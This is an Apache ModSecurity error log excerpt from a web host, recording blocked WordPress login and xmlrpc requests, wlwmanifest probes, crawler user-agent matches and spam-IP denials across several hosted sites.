[Tue May 26 18:52:33.359513 2026] [security2:error] [pid 1036960:tid 1037210] [client 2.58.56.163:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "webdisk.ndequipments.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWemYGNKXNii6nttH9TVwAAAP0"]
[Tue May 26 18:52:33.832142 2026] [security2:error] [pid 1036960:tid 1037041] [remote 38.95.35.74:47102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWemYGNKXNii6nttH9TZQAAm1A"]
[Tue May 26 18:52:33.971593 2026] [security2:error] [pid 1036960:tid 1037136] [client 114.119.159.37:49875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/portfolio/low-range-bathmats/"] [unique_id "ahWemYGNKXNii6nttH9TZgAAALM"], referer: https://www.anujoverseas.in/portfolio/low-range-bathmats/
[Tue May 26 18:52:34.077399 2026] [security2:error] [pid 1036960:tid 1037048] [remote 38.95.35.74:47102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWemoGNKXNii6nttH9TbgAA3Vc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:34.085958 2026] [security2:error] [pid 1036960:tid 1037164] [client 185.191.171.2:50310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.yourstorybag.com"] [uri "/sitemap.xml"] [unique_id "ahWemoGNKXNii6nttH9TbwAAAM8"]
[Tue May 26 18:52:34.086067 2026] [security2:error] [pid 1036960:tid 1037164] [client 185.191.171.2:50310] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/sitemap.xml"] [unique_id "ahWemoGNKXNii6nttH9TbwAAAM8"]
[Tue May 26 18:52:34.197012 2026] [security2:error] [pid 1036960:tid 1037059] [remote 123.30.233.13:36946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWemYGNKXNii6nttH9TagAA1WI"]
[Tue May 26 18:52:34.755619 2026] [security2:error] [pid 1036960:tid 1037044] [remote 123.30.233.13:36946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWemoGNKXNii6nttH9TgAAA2FM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:35.227259 2026] [security2:error] [pid 1036960:tid 1037114] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWemoGNKXNii6nttH9ThQAAAJ0"]
[Tue May 26 18:52:35.446873 2026] [security2:error] [pid 1036960:tid 1037054] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWem4GNKXNii6nttH9TlwAA2l0"]
[Tue May 26 18:52:35.447020 2026] [security2:error] [pid 1036960:tid 1037175] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWem4GNKXNii6nttH9TlwAA2l0"]
[Tue May 26 18:52:35.512949 2026] [security2:error] [pid 1036960:tid 1037092] [client 54.37.118.77:47912] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "midrivermarina.com"] [uri "/"] [unique_id "ahWem4GNKXNii6nttH9TmAAAAIc"]
[Tue May 26 18:52:35.513040 2026] [security2:error] [pid 1036960:tid 1037092] [client 54.37.118.77:47912] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "midrivermarina.com"] [uri "/"] [unique_id "ahWem4GNKXNii6nttH9TmAAAAIc"]
[Tue May 26 18:52:36.132395 2026] [security2:error] [pid 1036960:tid 1037169] [client 130.254.112.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWenIGNKXNii6nttH9TrQAAANQ"], referer: https://www.anujtradingco.com/
[Tue May 26 18:52:37.238480 2026] [security2:error] [pid 1036960:tid 1037210] [client 45.134.225.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWenYGNKXNii6nttH9T0AAAAP0"]
[Tue May 26 18:52:38.010925 2026] [security2:error] [pid 1036960:tid 1037122] [client 130.254.112.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWenYGNKXNii6nttH9T5QAAAKU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1253393&moderation-hash=2252fe51acf9daf310a2852562e689ab
[Tue May 26 18:52:38.134732 2026] [security2:error] [pid 1036960:tid 1037212] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWenYGNKXNii6nttH9T3AAAAP8"]
[Tue May 26 18:52:40.452246 2026] [security2:error] [pid 1036960:tid 1037206] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeoIGNKXNii6nttH9UMgAAAPk"]
[Tue May 26 18:52:41.217380 2026] [security2:error] [pid 1036960:tid 1036966] [remote 164.92.211.134:60994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.211.92.164.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeoIGNKXNii6nttH9USQAAswU"]
[Tue May 26 18:52:41.378243 2026] [security2:error] [pid 1036960:tid 1037085] [remote 164.92.211.134:60994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.211.92.164.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeoYGNKXNii6nttH9UXgAApXw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:42.844814 2026] [security2:error] [pid 1036960:tid 1037091] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeooGNKXNii6nttH9UgQAAAIY"]
[Tue May 26 18:52:44.811449 2026] [security2:error] [pid 1036960:tid 1037216] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWepIGNKXNii6nttH9UugAAAQM"]
[Tue May 26 18:52:44.811508 2026] [security2:error] [pid 1036960:tid 1037216] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWepIGNKXNii6nttH9UugAAAQM"]
[Tue May 26 18:52:44.811999 2026] [security2:error] [pid 1036960:tid 1037214] [client 65.109.156.37:53656] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/homepages/portfolio-photo/"] [unique_id "ahWepIGNKXNii6nttH9UuAAAAQE"]
[Tue May 26 18:52:45.047396 2026] [security2:error] [pid 1036960:tid 1037130] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWepIGNKXNii6nttH9UtAAAAK0"]
[Tue May 26 18:52:46.196048 2026] [security2:error] [pid 1036960:tid 1036983] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWepoGNKXNii6nttH9U3gAAyBY"]
[Tue May 26 18:52:46.196213 2026] [security2:error] [pid 1036960:tid 1037157] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWepoGNKXNii6nttH9U3gAAyBY"]
[Tue May 26 18:52:47.476454 2026] [security2:error] [pid 1036960:tid 1037096] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWep4GNKXNii6nttH9U8QAAAIs"]
[Tue May 26 18:52:48.145332 2026] [security2:error] [pid 1036960:tid 1037146] [client 118.174.155.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeqIGNKXNii6nttH9VDAAAAL0"], referer: https://www.anujtradingco.com/
[Tue May 26 18:52:48.665408 2026] [security2:error] [pid 1036960:tid 1036999] [remote 128.0.36.74:59150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.36.0.128.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeqIGNKXNii6nttH9VFgAAviY"]
[Tue May 26 18:52:49.463217 2026] [security2:error] [pid 1036960:tid 1037151] [client 118.174.155.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWeqYGNKXNii6nttH9VLwAAAMI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1509229&moderation-hash=ff24f933c09b701217bb336db4922b36
[Tue May 26 18:52:49.955360 2026] [security2:error] [pid 1036960:tid 1037217] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeqYGNKXNii6nttH9VMwAAAQQ"]
[Tue May 26 18:52:51.128222 2026] [security2:error] [pid 1036960:tid 1037019] [remote 52.18.195.140:60764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeqoGNKXNii6nttH9VYQAA4jo"]
[Tue May 26 18:52:51.416256 2026] [security2:error] [pid 1036960:tid 1037021] [remote 52.18.195.140:60764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWeq4GNKXNii6nttH9VbgAAizw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:52.429544 2026] [security2:error] [pid 1036960:tid 1037101] [client 86.228.186.249:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeq4GNKXNii6nttH9VfwAAAJA"]
[Tue May 26 18:52:53.461693 2026] [security2:error] [pid 1036960:tid 1037005] [remote 128.0.36.74:59150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.36.0.128.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWerYGNKXNii6nttH9VqgAAlCw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:52:53.674169 2026] [security2:error] [pid 1036960:tid 1037014] [remote 64.225.121.94:51972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.121.225.64.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWerYGNKXNii6nttH9VrwAA_jU"]
[Tue May 26 18:52:54.052059 2026] [security2:error] [pid 1036960:tid 1037093] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWerYGNKXNii6nttH9VsgAAAIg"]
[Tue May 26 18:52:55.570880 2026] [security2:error] [pid 1036960:tid 1037205] [client 45.95.39.166:34564] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "45.95.39.166" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWeroGNKXNii6nttH9V1QAAAPg"], referer: https://www.cagmedya.com/yenilikci-ve-etkili-web-tasarim-trendleri/
[Tue May 26 18:52:55.841490 2026] [security2:error] [pid 1036960:tid 1037028] [remote 79.143.178.15:38214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWer4GNKXNii6nttH9V6wAAjkM"]
[Tue May 26 18:52:56.329422 2026] [security2:error] [pid 1036960:tid 1037137] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWer4GNKXNii6nttH9V9QAAALQ"]
[Tue May 26 18:52:57.062063 2026] [security2:error] [pid 1036960:tid 1037042] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWesIGNKXNii6nttH9WCQAAzlE"]
[Tue May 26 18:52:57.062355 2026] [security2:error] [pid 1036960:tid 1037163] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWesIGNKXNii6nttH9WCQAAzlE"]
[Tue May 26 18:52:58.709474 2026] [security2:error] [pid 1036960:tid 1037093] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWesoGNKXNii6nttH9WNwAAAIg"]
[Tue May 26 18:53:00.019964 2026] [security2:error] [pid 1036960:tid 1037109] [client 14.184.43.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWes4GNKXNii6nttH9WWwAAAJg"]
[Tue May 26 18:53:01.450826 2026] [security2:error] [pid 1036960:tid 1037104] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWetIGNKXNii6nttH9WgQAAAJM"]
[Tue May 26 18:53:03.327647 2026] [security2:error] [pid 1036960:tid 1037140] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWetoGNKXNii6nttH9WtAAAALc"]
[Tue May 26 18:53:03.979945 2026] [security2:error] [pid 1036960:tid 1037066] [remote 69.49.112.72:25894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.112.49.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWet4GNKXNii6nttH9WvgAAiGk"]
[Tue May 26 18:53:06.357263 2026] [security2:error] [pid 1036960:tid 1037198] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWeuYGNKXNii6nttH9W-AAAAPE"]
[Tue May 26 18:53:07.230393 2026] [security2:error] [pid 1036960:tid 1037197] [client 107.170.66.128:54347] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWeu4GNKXNii6nttH9XFwAAAPA"]
[Tue May 26 18:53:07.242360 2026] [security2:error] [pid 1036960:tid 1037060] [remote 52.167.144.19:59013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.amdsi.org.in"] [uri "/amdsi-about-history.php"] [unique_id "ahWeu4GNKXNii6nttH9XFgAA6GM"]
[Tue May 26 18:53:07.739418 2026] [security2:error] [pid 1036960:tid 1037061] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeu4GNKXNii6nttH9XLAAA2mQ"]
[Tue May 26 18:53:07.739612 2026] [security2:error] [pid 1036960:tid 1037175] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWeu4GNKXNii6nttH9XLAAA2mQ"]
[Tue May 26 18:53:08.086604 2026] [security2:error] [pid 1036960:tid 1037103] [client 43.159.48.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWeu4GNKXNii6nttH9XJwAAAJI"]
[Tue May 26 18:53:08.094673 2026] [security2:error] [pid 1036960:tid 1037147] [client 43.172.195.72:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWeu4GNKXNii6nttH9XMgAAAL4"]
[Tue May 26 18:53:08.790685 2026] [security2:error] [pid 1036960:tid 1037128] [client 107.170.66.128:54454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.66.170.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consultrgb.moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahWevIGNKXNii6nttH9XQAAAAKs"]
[Tue May 26 18:53:08.929216 2026] [security2:error] [pid 1036960:tid 1037173] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWevIGNKXNii6nttH9XRgAAANg"]
[Tue May 26 18:53:09.074642 2026] [security2:error] [pid 1036960:tid 1037211] [client 107.170.66.128:55040] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWevYGNKXNii6nttH9XVgAAAP4"]
[Tue May 26 18:53:09.792430 2026] [proxy:error] [pid 1036960:tid 1037199] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:53:09.792478 2026] [proxy_http:error] [pid 1036960:tid 1037199] [client 147.185.132.70:59456] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:53:09.793065 2026] [proxy:error] [pid 1036960:tid 1037199] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:53:09.793097 2026] [proxy_http:error] [pid 1036960:tid 1037199] [client 147.185.132.70:59456] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:53:10.312376 2026] [security2:error] [pid 1036960:tid 1037155] [client 107.170.66.128:55137] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWevoGNKXNii6nttH9XgAAAAMY"]
[Tue May 26 18:53:10.638205 2026] [security2:error] [pid 1036960:tid 1037183] [client 178.20.47.39:63926] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.47.39" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "koneksi.com.co"] [uri "/wp-comments-post.php"] [unique_id "ahWevoGNKXNii6nttH9XjQAAAOI"], referer: https://koneksi.com.co/como-borrar-o-eliminar-una-cuenta-de-instagram-para-siempre/
